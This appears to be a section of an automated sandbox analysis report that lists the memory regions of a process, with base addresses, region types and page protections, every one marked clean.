clean
10000
unkown image
page read and write
clean
2C6B000
heap private
page read and write
clean
7FF000EA000
unkown
page execute and read and write
clean
3D0000
unkown image
page readonly
clean
279D000
unkown
page read and write
clean
2CE000
heap default
page read and write
clean
362F000
unkown
page read and write
clean
140000
heap default
page read and write
clean
23E0000
heap private
page read and write
clean
357E000
unkown
page read and write
clean
3696000
unkown
page read and write
clean
1CA0000
unkown image
page readonly
clean
3328000
unkown
page read and write
clean
7FF00290000
unkown
page read and write
clean
3AE9000
unkown
page read and write
clean
1B44000
heap private
page read and write
clean
7FF0002C000
unkown
page execute and read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
DF000
unkown
page read and write
clean
1A0000
heap private
page read and write
clean
145000
unkown
page read and write
clean
1BBC3000
heap private
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
321B000
unkown
page read and write
clean
39A8000
unkown
page read and write
clean
2B9A000
heap private
page execute and read and write
clean
1B81B000
unkown
page read and write
clean
36AF000
unkown
page read and write
clean
1DF0000
unkown
page read and write
clean
22BF000
unkown
page read and write
clean
1AF0000
unkown image
page readonly
clean
2FBE000
unkown
page read and write
clean
2C10000
heap private
page read and write
clean
180000
unkown
page read and write
clean
304D000
unkown
page read and write
clean
3C7000
heap default
page read and write
clean
70000
unkown
page read and write
clean
23FD000
unkown
page read and write
clean
3B0B000
unkown
page read and write
clean
3CC0000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
3667000
unkown
page read and write
clean
550000
unkown image
page readonly
clean
416000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2050000
unkown image
page readonly
clean
710000
unkown image
page readonly
clean
3A64000
unkown
page read and write
clean
2F10000
unkown
page read and write
clean
307B000
unkown
page read and write
clean
7FF00280000
unkown
page execute and read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
1D67000
unkown image
page readonly
clean
2DDF000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
2D3F000
unkown
page read and write
clean
1C59E000
unkown
page read and write
clean
1CA6D000
unkown
page read and write
clean
169000
unkown
page read and write
clean
3AE5000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
22E4000
heap private
page read and write
clean
1B629000
unkown
page read and write
clean
7FF001B0000
unkown
page execute and read and write
clean
2D0000
heap default
page read and write
clean
206000
unkown
page read and write
clean
35F3000
unkown
page read and write
clean
2250000
heap private
page read and write
clean
1CAFE000
unkown
page read and write
clean
1ED0000
heap private
page read and write
clean
2B10000
unkown
page read and write
clean
3A97000
unkown
page read and write
clean
3029000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
7FFFFFD0000
unkown image
page readonly
clean
1B785000
unkown
page read and write
clean
BB000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
2C15000
heap private
page read and write
clean
1B5F4000
unkown
page read and write
clean
7FF001D0000
unkown
page execute and read and write
clean
510000
heap private
page read and write
clean
2700000
unkown image
page readonly
clean
2A70000
heap private
page execute and read and write
clean
7FF002A0000
unkown
page execute and read and write
clean
1ADE0000
unkown
page read and write
clean
2E6000
unkown
page read and write
clean
2A1F000
unkown
page read and write
clean
12CE1000
unkown
page read and write
clean
14A000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
1C00000
unkown image
page readonly
clean
7FFFFFC0000
unkown image
page readonly
clean
110000
unkown image
page readonly
clean
20B0000
heap private
page read and write
clean
35CD000
unkown
page read and write
clean
7FF001C0000
unkown
page execute and read and write
clean
390000
unkown image
page readonly
clean
39BB000
unkown
page read and write
clean
454E000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
12D85000
unkown
page read and write
clean
3E0000
unkown
page read and write
clean
7FF00142000
unkown
page execute and read and write
clean
169000
unkown
page read and write
clean
7FF00200000
unkown
page execute and read and write
clean
2080000
unkown image
page readonly
clean
2155000
heap private
page read and write
clean
2CF0000
heap private
page read and write
clean
325A000
unkown
page read and write
clean
1AD0000
unkown image
page readonly
clean
30000
unkown image
page readonly
clean
2A2D000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
2250000
unkown
page read and write
clean
35E0000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
70000
unkown
page read and write
clean
367A000
unkown
page read and write
clean
13F000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
307B000
unkown
page read and write
clean
3E60000
heap private
page read and write
clean
3CC0000
unkown
page read and write
clean
F0000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
2250000
unkown
page read and write
clean
39FC000
unkown
page read and write
clean
308B000
unkown
page read and write
clean
440000
heap private
page read and write
clean
5E0000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
3D4000
heap private
page read and write
clean
7FF001A0000
unkown
page execute and read and write
clean
530000
unkown image
page readonly
clean
2F68000
unkown
page read and write
clean
E0000
unkown
page read and write
clean
7FF000D2000
unkown
page execute and read and write
clean
305B000
unkown
page read and write
clean
1B9F0000
heap private
page read and write
clean
3214000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
39E000
heap default
page read and write
clean
7EFE0000
unkown image
page readonly
clean
10B000
unkown
page read and write
clean
3960000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
7FFFFF10000
unkown
page execute and read and write
clean
291E000
unkown
page read and write
clean
3A2F000
unkown
page read and write
clean
1C850000
heap private
page read and write
clean
140000
unkown image
page readonly
clean
2B90000
heap private
page execute and read and write
clean
E7000
unkown
page read and write
clean
305E000
unkown
page read and write
clean
3A93000
unkown
page read and write
clean
3A6D000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
1B600000
unkown
page read and write
clean
2920000
unkown
page read and write
clean
36AC000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
1CC6000
unkown
page read and write
clean
3A48000
unkown
page read and write
clean
12FD0000
unkown
page read and write
clean
17E000
heap default
page read and write
clean
2200000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
1B800000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
7FFFFFC2000
unkown image
page readonly
clean
1B86000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
1ED5000
heap private
page read and write
clean
7FF001E7000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
2F2F000
unkown
page read and write
clean
20000
unkown image
page read and write
clean
2250000
unkown
page read and write
clean
7FF00022000
unkown
page execute and read and write
clean
100000
unkown
page read and write
clean
11D000
unkown
page read and write
clean
3288000
unkown
page read and write
clean
2A35000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
7FF00170000
unkown
page execute and read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
2D7000
heap default
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
1B0000
heap default
page read and write
clean
21DB000
heap private
page read and write
clean
1E6000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
1C9DD000
unkown
page read and write
clean
301C000
unkown
page read and write
clean
3A13000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
2FC2000
unkown
page read and write
clean
2C4B000
heap private
page read and write
clean
450000
heap private
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
1E00000
unkown
page read and write
clean
3201000
unkown
page read and write
clean
2AF0000
unkown
page read and write
clean
7FF00240000
unkown
page read and write
clean
90000
heap default
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
3F0000
heap private
page read and write
clean
7FF00190000
unkown
page execute and read and write
clean
3680000
unkown
page read and write
clean
233B000
heap private
page read and write
clean
3E9000
heap default
page read and write
clean
119000
unkown
page read and write
clean
3837000
unkown
page read and write
clean
156000
unkown
page read and write
clean
11D000
unkown
page read and write
clean
7EFE0000
unkown image
page readonly
clean
20000
unkown image
page readonly
clean
2160000
heap private
page read and write
clean
7FF00180000
unkown
page read and write
clean
3062000
unkown
page read and write
clean
2800000
unkown
page read and write
clean
2FEB000
unkown
page read and write
clean
1B60B000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
32A3000
unkown
page read and write
clean
7FF00100000
unkown
page read and write
clean
3E64000
heap private
page read and write
clean
7FF00250000
unkown
page execute and read and write
clean
2250000
unkown
page read and write
clean
1B9A0000
unkown
page read and write
clean
12F92000
unkown
page read and write
clean
1B3B0000
unkown
page read and write
clean
308F000
unkown
page read and write
clean
1E87000
unkown image
page readonly
clean
2B0000
unkown
page read and write
clean
3025000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
D0000
unkown image
page read and write
clean
27A0000
unkown
page read and write
clean
2FB5000
unkown
page read and write
clean
7FF00050000
unkown
page read and write
clean
2030000
heap private
page read and write
clean
30B8000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2F5000
unkown
page read and write
clean
2A30000
unkown
page read and write
clean
323D000
unkown
page read and write
clean
15B000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
31BA000
unkown
page read and write
clean
12DF1000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
2169000
heap private
page read and write
clean
12CE5000
unkown
page read and write
clean
347000
heap private
page read and write
clean
2F22000
unkown
page read and write
clean
2FF8000
unkown
page read and write
clean
2FAC000
unkown
page read and write
clean
300000
unkown
page read and write
clean
35E3000
unkown
page read and write
clean
2F2C000
unkown
page read and write
clean
216000
unkown
page read and write
clean
336000
unkown
page read and write
clean
3AAD000
unkown
page read and write
clean
39CD000
unkown
page read and write
clean
30BC000
unkown
page read and write
clean
3A3E000
unkown
page read and write
clean
1C72E000
unkown
page read and write
clean
366A000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
1C90000
unkown
page read and write
clean
3A35000
unkown
page read and write
clean
CE000
heap default
page read and write
clean
5D0000
unkown image
page readonly
clean
2115000
heap private
page read and write
clean
3A29000
unkown
page read and write
clean
39EE000
unkown
page read and write
clean
4B6000
unkown
page read and write
clean
2BD0000
heap private
page execute and read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
311E000
unkown
page read and write
clean
3A45000
unkown
page read and write
clean
361C000
unkown
page read and write
clean
12EF1000
unkown
page read and write
clean
279F000
unkown
page read and write
clean
10000
unkown image
page read and write
clean
1D5000
unkown
page read and write | page guard
clean
3007000
unkown
page read and write
clean
600000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
366D000
unkown
page read and write
clean
3986000
unkown
page read and write
clean
32B4000
unkown
page read and write
clean
3A49000
unkown
page read and write
clean
368000
heap default
page read and write
clean
3699000
unkown
page read and write
clean
3683000
unkown
page read and write
clean
3B3D000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
D0000
unkown image
page readonly
clean
2300000
heap private
page read and write
clean
2D8000
heap default
page read and write
clean
30FF000
unkown
page read and write
clean
39D6000
unkown
page read and write
clean
2FCF000
unkown
page read and write
clean
1B7DB000
unkown
page read and write
clean
7FF001A0000
unkown
page read and write
clean
444000
heap private
page read and write
clean
1C5D0000
heap private
page read and write
clean
372D000
unkown
page read and write
clean
2150000
heap private
page read and write
clean
3A15000
unkown
page read and write
clean
470000
heap private
page read and write
clean
1B90000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
2FB0000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
540000
unkown image
page readonly
clean
307F000
unkown
page read and write
clean
200B000
heap private
page read and write
clean
2A00000
unkown
page read and write
clean
2AC0000
unkown image
page readonly
clean
7FFFFFD0000
unkown image
page readonly
clean
7FF00210000
unkown
page read and write
clean
2D7F000
unkown
page read and write
clean
330000
unkown image
page readonly
clean
7FF00250000
unkown
page execute and read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
441000
heap default
page read and write
clean
27A0000
unkown
page read and write
clean
340000
heap private
page read and write
clean
29FF000
unkown
page read and write
clean
388000
heap default
page read and write
clean
15F000
unkown
page read and write
clean
E8000
unkown
page read and write
clean
5F0000
heap private
page read and write
clean
3018000
unkown
page read and write
clean
2A7A000
heap private
page execute and read and write
clean
1CB73000
heap private
page read and write
clean
7EFE0000
unkown image
page readonly
clean
306F000
unkown
page read and write
clean
3219000
unkown
page read and write
clean
31A1000
unkown
page read and write
clean
20000
unkown image
page readonly
clean
7FF00270000
unkown
page execute and read and write
clean
372A000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
36BC000
unkown
page read and write
clean
34C0000
unkown
page read and write
clean
30FB000
unkown
page read and write
clean
3A01000
unkown
page read and write
clean
2B2A000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
2FF1000
unkown
page read and write
clean
3A56000
unkown
page read and write
clean
3343000
unkown
page read and write
clean
160000
unkown image
page read and write
clean
3081000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
1D6000
unkown
page read and write
clean
30C5000
unkown
page read and write
clean
3A68000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
3A39000
unkown
page read and write
clean
3D0000
heap private
page read and write
clean
30AE000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
1D57000
unkown image
page readonly
clean
3B0000
unkown image
page readonly
clean
50000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
2F73000
unkown
page read and write
clean
2FE1000
unkown
page read and write
clean
36BF000
unkown
page read and write
clean
480000
unkown
page read and write
clean
450000
unkown image
page readonly
clean
1CBE0000
unkown image
page readonly
clean
10000
unkown image
page read and write
clean
2250000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
7FF001F0000
unkown
page read and write
clean
7FF00160000
unkown
page execute and read and write
clean
27A0000
unkown
page read and write
clean
170000
unkown
page read and write
clean
7FF00180000
unkown
page read and write
clean
1EF0000
unkown image
page readonly
clean
3FD0000
unkown image
page readonly
clean
27A0000
unkown
page read and write
clean
20000
unkown image
page readonly
clean
E6000
unkown
page read and write
clean
3686000
unkown
page read and write
clean
36A9000
unkown
page read and write
clean
361F000
unkown
page read and write
clean
20000
unkown image
page readonly
clean
3420000
unkown
page read and write
clean
3A5B000
unkown
page read and write
clean
1FD5000
heap private
page read and write
clean
306B000
unkown
page read and write
clean
3A19000
unkown
page read and write
clean
1D20000
heap private
page execute and read and write
clean
38F8000
unkown
page read and write
clean
39A5000
unkown
page read and write
clean
14A000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
3B1000
heap default
page read and write
clean
1C40000
unkown image
page readonly
clean
3078000
unkown
page read and write
clean
36A6000
unkown
page read and write
clean
116000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
1B550000
unkown
page read and write
clean
321E000
unkown
page read and write
clean
3A8E000
unkown
page read and write
clean
3A26000
unkown
page read and write
clean
180000
unkown image
page readonly
clean
D0000
unkown image
page readonly
clean
1C50E000
unkown
page read and write
clean
7FF001C0000
unkown
page read and write
clean
2165000
heap private
page read and write
clean
3241000
unkown
page read and write
clean
147000
heap default
page read and write
clean
3606000
unkown
page read and write
clean
3008000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
1EE000
heap default
page read and write
clean
2D0000
heap default
page read and write
clean
190000
unkown image
page readonly
clean
359000
heap default
page read and write
clean
2D81000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
2FCB000
unkown
page read and write
clean
39FB000
unkown
page read and write
clean
1F70000
heap private
page execute and read and write
clean
1A4000
heap private
page read and write
clean
3989000
unkown
page read and write
clean
7FFFFFD0000
unkown image
page readonly
clean
398F000
unkown
page read and write
clean
670000
unkown image
page readonly
clean
12D0C000
unkown
page read and write
clean
7FF00240000
unkown
page execute and read and write
clean
60000
unkown image
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
2CF5000
heap private
page read and write
clean
21B000
unkown
page read and write
clean
1B5BD000
unkown
page read and write
clean
560000
unkown image
page readonly
clean
7FFFFFD0000
unkown image
page readonly
clean
7FFFFFC2000
unkown image
page readonly
clean
4E0000
unkown image
page readonly
clean
3CBF000
unkown
page read and write
clean
D0000
unkown image
page read and write
clean
30000
unkown image
page readonly
clean
35DD000
unkown
page read and write
clean
375000
heap default
page read and write
clean
7EFE0000
unkown image
page readonly
clean
E0000
unkown
page read and write
clean
165000
unkown
page read and write
clean
3A9D000
unkown
page read and write
clean
151000
unkown
page read and write
clean
312B000
unkown
page read and write
clean
2FCC000
unkown
page read and write
clean
5F0000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
1CDC7000
unkown image
page readonly
clean
2D18000
unkown
page read and write
clean
5E0000
unkown image
page readonly
clean
7FF00190000
unkown
page execute and read and write
clean
3055000
unkown
page read and write
clean
312E000
unkown
page read and write
clean
1B7A5000
unkown
page read and write
clean
13F000
unkown
page read and write
clean
7FF00200000
unkown
page execute and read and write
clean
2F32000
unkown
page read and write
clean
12F30000
unkown
page read and write
clean
7FFFFF10000
unkown
page execute and read and write
clean
EC000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
15F000
unkown
page read and write
clean
6A0000
unkown image
page readonly
clean
165000
unkown
page read and write
clean
3693000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
100000
unkown image
page readonly
clean
3013000
unkown
page read and write
clean
40000
unkown image
page readonly
clean
7FF00052000
unkown
page execute and read and write
clean
7FF00280000
unkown
page execute and read and write
clean
35DA000
unkown
page read and write
clean
7FF00042000
unkown
page execute and read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
3049000
unkown
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
1B8A0000
unkown
page read and write
clean
1B802000
unkown
page read and write
clean
2B26000
unkown
page read and write
clean
2A4A000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
30D0000
unkown
page read and write
clean
2FD2000
unkown
page read and write
clean
2250000
unkown
page read and write
clean
2B50000
unkown
page read and write
clean
7FFFFFB0000
unkown image
page readonly
clean
145000
unkown
page read and write
clean
7FF00217000
unkown
page read and write
clean
2110000
heap private
page read and write
clean
7FF00220000
unkown
page execute and read and write
clean
358F000
unkown
page read and write
clean
1B5E0000
unkown
page read and write
clean
2900000
unkown
page read and write
clean
5F4000
heap private
page read and write
clean
7FFFFFC2000
unkown image
page readonly
clean
7FFFFFB2000
unkown image
page readonly
clean
460000
unkown image
page readonly
clean
1ECD000
unkown
page read and write
clean
2050000
unkown image
page readonly
clean
460000
unkown image
page readonly
clean
13F000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
3B2E000
unkown
page read and write
clean
7FFFFFB2000
unkown image
page readonly
clean
2F4E000
unkown
page read and write
clean
30000
unkown image
page readonly
clean
7FFFFFD0000
unkown image
page readonly
clean
1E0000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
290000
heap default
page read and write
clean
3ABD000
unkown
page read and write
clean
E0000
unkown image
page read and write
clean
7FF002B0000
unkown
page execute and read and write
clean
2350000
unkown image
page readonly
clean
3AB3000
unkown
page read and write
clean
344000
heap private
page read and write
clean
D0000
unkown image
page readonly
clean
34CB000
unkown
page read and write
clean
1CB60000
heap private
page read and write
clean
1F00000
heap private
page read and write
clean
7FF001B0000
unkown
page read and write
clean
27A0000
unkown
page read and write
clean
454000
heap private
page read and write
clean
32EA000
unkown
page read and write
clean
3A3B000
unkown
page read and write
clean
7FF00102000
unkown
page execute and read and write
clean
3121000
unkown
page read and write
clean
28FE000
unkown
page read and write
clean
2255000
heap private
page read and write
clean
12DAC000
unkown
page read and write
clean
1B5B4000
unkown
page read and write
clean
401000
heap default
page read and write
clean
2710000
unkown image
page readonly
clean
313D000
unkown
page read and write
clean
151000
unkown
page read and write
clean
433000
heap default
page read and write
clean
3095000
unkown
page read and write
clean
30ED000
unkown
page read and write
clean
39AB000
unkown
page read and write
clean
3047000
unkown
page read and write
clean
7FFFFFC0000
unkown image
page readonly
clean
3690000
unkown
page read and write
clean
31E8000
unkown
page read and write
clean
7FF00150000
unkown
page read and write
clean
21A0000
heap private
page read and write
clean
There are 875 hidden memdumps, click here to show them.